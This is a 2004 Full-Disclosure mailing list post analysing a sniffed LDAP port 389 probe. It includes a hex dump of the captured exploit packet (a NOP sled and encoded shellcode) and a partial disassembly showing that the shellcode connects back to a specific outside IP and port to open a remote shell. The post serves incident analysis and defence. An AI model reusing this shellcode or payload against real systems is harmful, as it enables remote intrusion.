Full Disclosure mailing list archives
(no subject)
From: "Disclosure From OSSI" <disclosure () ossecurity ca>
Date: Thu, 26 Feb 2004 00:13:28 -0500
We grabbed the binary data from the sniff'ed below. After a quick reverse, it turns out to be a connect-back shellcode with back server p-> 24.19.147.225.

Partially disassembled:

00000084 68 18 13 93 E1    push 0E1931318h
00000089 68 02 00 22 E4    push 0E4220002h
0000008E 8B CC             mov ecx, esp
00000090 6A 10             push 10h
00000092 51                push ecx
00000093 FF 76 24          push dword ptr [esi+24h]
00000096 FF D0             call eax

= = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = =
The following info was automatically generated by "OSAnalyzer" program.
= = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = =

call eax=776ba5a3
776ba5a3 = WS2_32.dll!connect with para 3
    Para 0 is socket # 00000094
    Para 1 is name p-> 00dafcc4
    Para 2 is namelen 00000010
        sin_family AF_INET , port 8932 IP 24.19.147.225
call external 776ba5a3 stack 0000000c return ffffffff ;

=================== a quick translation =================================

C:\TEMP>ping -a 24.19.147.225

Pinging c-24-19-147-225.client.comcast.net [24.19.147.225] with 32 bytes of data

Hope the info is useful to you.

Regards
Peter Huang
Peter.Huang AT ossecurity.ca
http://www.ossecurity.ca/
Date: Wed, 25 Feb 2004 08:46:26 -0800
From: John Sage <jsage () finchhaven com>
To: full-disclosure () lists netsys com
Subject: Re: [Full-disclosure] Probes on port 389

Just picked this up:

On Tue, Feb 24, 2004 at 11:06:50AM -0600, Schmehl, Paul L wrote:
> From: "Schmehl, Paul L" <pauls () utdallas edu>
> To: <intrusion () sans org>, <full-disclosure () lists netsys com>
> Subject: [Full-disclosure] Probes on port 389
> Date: Tue, 24 Feb 2004 11:06:50 -0600
>
> I threw up a quick rule on snort to monitor probes on port 389 because I have been seeing entries in /var/log/messages on some boxes that I am responsible for. This morning we had a probe that hit 26205 different IPs on that port in about 7 minutes (SYN scan only - no payload.) The source IP was a mailserver in England. (They've been notified.)

/* snip */

input: snort.log.1077660886
filter: ip and ( src host 24.6.176.211 )
#
T 2004/02/25 08:08:15.042588 24.6.176.211:220 -> 24.19.147.xxx:389 [S]
#
T 2004/02/25 08:08:15.092297 24.6.176.211:220 -> 24.19.147.xxx:389 [R]
#
T 2004/02/25 08:08:15.097128 24.6.176.211:2211 -> 24.19.147.xxx:389 [S]
#
T 2004/02/25 08:08:15.146174 24.6.176.211:2211 -> 24.19.147.xxx:389 [A]
#
T 2004/02/25 08:08:15.154158 24.6.176.211:2211 -> 24.19.147.xxx:389 [A]
  30 82 0a 3d 02 01 01 60 82 01 36 02 ff ff ff ff    0..=...`..6.....
  50 a9 f7 00 10 13 90 90 90 90 90 90 90 90 90 90    P...............
  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90    ................
  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90    ................
  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90    ................
  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90    ................
  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90    ................
  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90    ................
  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90    ................
  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90    ................
  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90    ................
  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90    ................
  90 90 90 90 90 90 90 90 90 eb 02 eb 05 e8 f9 ff    ................
  ff ff 5b 80 c3 10 33 c9 66 b9 33 01 80 33 95 43    ..[...3.f.3..3.C
  e2 fa 14 79 05 94 95 95 1e 61 c0 c3 f1 34 a5 95    ...y.....a...4..
  95 95 1e d5 99 1e e5 89 38 1e fd 9d 7e 95 1e 50    ........8...~..P
  cb c8 1c 93 6a a3 fd 1b db 9b 79 7d 38 95 95 95    ....j.....y}8...
  fd a6 a7 95 95 fd e2 e6 a7 ca c1 6a 45 1e 6d c2    ...........jE.m.
  fd 4c 9c 60 38 7d 06 95 95 95 a6 5c c4 c4 c4 c4    .L.`8}.....\....
  d4 c4 d4 c4 6a 45 1c d3 b1 c2 fd 79 6c 3f f5 7d    ....jE.....yl?.}
  ec 95 95 95 fd 8d 86 06 74 fd 97 95 b7 71 1e 59    ........t....q.Y
  ff 85 c4 6a e3 b1 6a 45 fd f6 f8 f1 95 1c f3 a5    ...j..jE........
  6a a3 fd e7 6b 26 83 7d c4 95 95 95 1c d3 8b 16    j...k&.}........
  79 c1 18 a9 b1 a6 55 a6 5c 16 54 80 3e 77 68 53    y.....U.\.T.>whS
  d1 b1 85 d1 6b d1 b1 a8 6b d1 b1 a9 1e d3 b1 1c    ....k...k.......
  d1 b1 dd 1c d1 b1 d9 1c d1 b1 c5 18 d1 b1 85 c1    ................
  c5 c4 c4 c4 ff 94 c4 c4 6a e3 a5 c4 6a c3 8b 6a    ........j...j..j
  a3 fd 7a 5b 75 f5 7d 97 95 95 95 6a 45 c6 c0 c3    ..z[u.}....jE...
  c2 1e f9 b1 8d 1e d0 a9 1e c1 90 ed 96 40 1e df    .............@..
  8d 1e cf b5 96 48 76 a7 dc 1e a1 1e 96 60 a6 6a    .....Hv......`.j
  69 a6 55 39 af 51 e1 92 54 5a 98 96 6d 7e 67 ae    i.U9.Q..TZ..m~g.
  e9 b1 81 e0 74 1e cf b1 96 48 f3 1e 99 de 1e cf    ....t....H......
  89 96 48 1e 91 1e 96 50 7e 97 a6 55 1e 40 ca cb    ..H....P~..U.@..
  c8 ce 57 91 95 90 90 90 90 90 90 90 90 90 90 90    ..W.............

... deleted ...

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html